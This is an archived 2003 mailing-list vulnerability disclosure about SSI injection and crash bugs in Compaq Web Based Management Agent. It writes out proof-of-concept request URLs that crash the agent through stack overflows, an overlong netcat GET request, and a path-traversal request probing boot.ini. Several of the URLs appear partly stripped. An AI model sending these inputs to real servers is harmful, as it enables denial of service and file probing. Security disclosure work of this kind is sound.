[VulnWatch] SSI vulnerability in Compaq Web Based Management Agent

From: Ian Vitek (ian.vitek_at_as5-5-7.bi.s.bonet.se)
Date: 06/30/03

  • Next message: iDEFENSE Labs: "[VulnWatch] iDEFENSE Security Advisory 07.01.03: Caché Insecure Installation File and Directory Permissions"
    Date: Mon, 30 Jun 2003 20:28:00 +0200 (CEST)
    To: <vulnwatch@vulnwatch.org>
    
    

    SSI vulnerability in Compaq Web Based Management Agent
    ======================================================

    Type of vulnerabilities:
      Server Side Include injection. Exploitable.
      Stack overflows and access violations. Exploitable?
      Creation of script objects. Exploitable?

    Affected Software: Compaq Web Based Management Agent
    Verified Platforms: Windows

    Background and problem description
    ==================================
    Bashis (bash at wcd.se) has found several vulnerabilities
    in Compaq Web Based Management Agent. This Agent runs on
    TCP port 2301 (HTTP) or 2381 (HTTPS).
    The agent uses "tags" to run funktions at the server side.
    To list all tags:
    http://IP:2301/>

    To crash the agent:
    http://IP:2301/<!>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc
    http://IP:2301/survey/<!>
    Stack overflow (0xc00000fd), Address: 0x10039869

    This crashes the agent too:
    http://IP:2301/>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc
    http://IP:2301/>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc
    http://IP:2301/survey/>
    Stack overflow (0xc00000fd), Address: 0x10039869

    The cause could be an endless loop (the result
    contains a tag to display an URL, and the result
    contains a tag to display an URL, and the result...)

    More strange stack overflows:
    http://IP:2301/>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc

    Many tags take input that seems vulnerable:
    http://IP:2301/>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc

    Netcat following:
    GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
    Access violation (0xc0000005), Address: 0x100368a5

    Check file existens. (with a nice 'input box')
    http://IP:2301/>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

    It looks like you could create script objects.
    Check the tags with <!.TableDisplayTags>. Some of the
    CreateObject tags has the parameter 'script'.
    I don't know if it could be done though.

    Is this just another remote DoS?

    I have mailed HP (security-alert@hp.com) and got an automated
    response 28/5 2003.

    If someone want to forward this mail they may do so.

    To all of my friends; See you in Vegas!
    The Swedes are comming.
    //Ian Vitek


  • Next message: iDEFENSE Labs: "[VulnWatch] iDEFENSE Security Advisory 07.01.03: Caché Insecure Installation File and Directory Permissions"

    Relevant Pages

    • [NEWS] SSI Vulnerability in Compaq Web Based Management Agent
      ... Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada. ... The Compaq Web Based Management Agent for Servers provides device ... SSI allow attackers at the very least, to cause the agent to crash, and to ... Stack overflow, Address: 0x77f0c3dc ...
      (Securiteam)
    • SSI vulnerability in Compaq Web Based Management Agent
      ... SSI vulnerability in Compaq Web Based Management Agent ... The agent uses "tags" to run funktions at the server side. ... Stack overflow, Address: 0x77f0c3dc ... It looks like you could create script objects. ...
      (Vuln-Dev)